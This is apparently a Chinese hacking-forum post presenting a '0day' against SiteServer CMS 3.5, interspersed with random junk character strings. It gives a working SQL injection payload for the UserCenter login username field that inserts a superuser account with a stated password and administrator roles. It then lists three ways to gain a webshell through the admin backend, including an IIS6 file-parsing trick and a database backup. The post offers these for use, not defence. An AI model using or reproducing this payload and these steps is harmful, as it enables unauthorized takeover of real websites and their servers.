SiteServer CMS 0Day

admin

经测试秒杀最新的3.5版

stieserver官网:www.siteserver.cn

( X5 Z3 I/ {- M

EXP:
" m( O. r$ I( A  D0 l8 X
2 J) y. @2 T& @* `) _直接访问UserCenter/login.aspx
0 ^, C' m4 t$ |: x4 }, J

" j; a% F# k! S% ?: D: I' F
用户名处输入：

3 z' G* L% t  m9 O# k. y' q123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--
5 ?# ^; K  T# a& R9 b$ G

& S* V# X( h" m# q; r7 l
7 J' R) x! W; v  K密码为空，输入验证码后提交，既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。
$ g0 U+ z* s( L* i3 u3 e
# t1 @- g4 E# S# }. }7 j6 B

3 R& M2 z0 ^5 }; |& b4 i% }$ j" O% q之后再访问后台SiteServer/login.aspx用插入的用户登陆


% W9 n5 S0 e; }
2 n5 {6 k& N5 i! ^: s( b% C- m" i' t后台拿webshell的三种方法：

% f$ y" N' a/ u7 I- x, b/ y一、
! Q9 h1 I, s4 u
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx

( P; ]. h8 u! Y二、
6 k6 _( k" a7 ]6 W8 m% ^
; O" @$ B. }% {) Y5 S" k9 ]2 R' G' `% }% |成员权限-》添加用户-》用户名为：1.asp

http://127.0.0.1/usercenter/
' ?" o) e$ A4 F" b% g1 B
7 i& M) D: q1 [- @) T) E. k用刚才添加的1.asp去登陆，进去之后上传个人头像，利用IIS6解析漏洞得webshell
: H1 X8 |# w+ G! \" W, Q$ g5 @% v& B
6 D" S7 A/ m: x, E  j! b7 |1 E- \（ps：后台添加用户时不会验证是否含有非法字符）

3 E! O1 `& z- v/ i  b' I$ v三、

6 m2 v% \, h' s2 n* T9 x系统工具-》实用工具-》机器参数查看
可以看到数据库类型、名称，WEB路径

系统工具-》数据库工具-》SQL语句查询
: |9 Q2 T! X  O1 v; Y这功能做的不错，直接就相当于一个查询分析器，什么回显都有，可以backup得webshell，或者利用sqlserver配置不当直接XXOO。